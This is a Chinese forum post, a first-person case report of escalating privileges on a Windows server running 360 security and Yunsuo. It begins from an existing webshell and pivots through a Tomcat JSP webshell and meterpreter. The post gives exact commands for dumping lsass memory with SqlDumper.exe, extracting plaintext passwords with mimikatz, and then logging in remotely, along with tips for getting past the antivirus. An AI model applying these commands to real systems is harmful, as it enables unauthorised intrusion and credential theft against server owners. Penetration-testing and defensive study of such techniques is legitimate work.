原文链接:绕过360安全套装+云锁提权案例
开局一个Webshell,先进行简单的信息搜集,查看当前权限,正常的iis权限。
查看版本
- wmic OS get Caption,CSDVersion,OSArchitecture,Version
查看软件
- wmic product get name,version
因为提前说了有360和云锁。
360全套带云锁,net、net1、netstat不能执行。sql server数据库,但是因为站酷分离,而且cmd被删除,不能执行命令,懒得去突破了。
而且云锁有个最大的特点就是上传的exe不能执行,加上360全套。传上去的基本不行,传微软自带的net也没用,直接秒没。
因为不能穿exe来提权,所以只能先扫下本地有什么端口。webshell+nmap全端口。
开了3389和1433还有3306,但是1433死活找不到密码,碰撞了几个也不行。
发现有好几个tomcat端口,我们很多人应该知道tomcat继承的是system权限或者administrator权限。既然不能用exe提权,我们来用自带的tomcat。
nmap已经扫描出来端口,我们只要找到conf/server.xml文件对应下端口就可以了。
直接去上传个jsp马就行了。
就算是系统权限也是不能执行net net1等等,exe也一样。
所以试了bat导出注册表sam失败了。hta不能执行,powershell失败。所以用了冰蝎自带的meterpreter.
说下sql server自带的工具 SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。
SqlDumper.exe默认存放在C:⧵Program Files⧵Microsoft SQLServer⧵number⧵Shared,number代表SQL Server的版本,参考如下:
- 可能存在的位置:
- C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe
- C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe
- C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe
- 查看lsass.exe的pid
- tasklist /svc |findstr lsass.exe
- 584是lsass.exe的pid
- "C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" 584 0 0x01100
利用webshell把SQLDmpr0001.mdmp下载下来,然后使用mimikatz法国神器得到目标主机明文密码。
- mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit">1.txt
可以使用query user命令看下管理员在不在, 我们直接登入进去。
结束。
| 
发表于 2021-10-20 14:14:22
楼主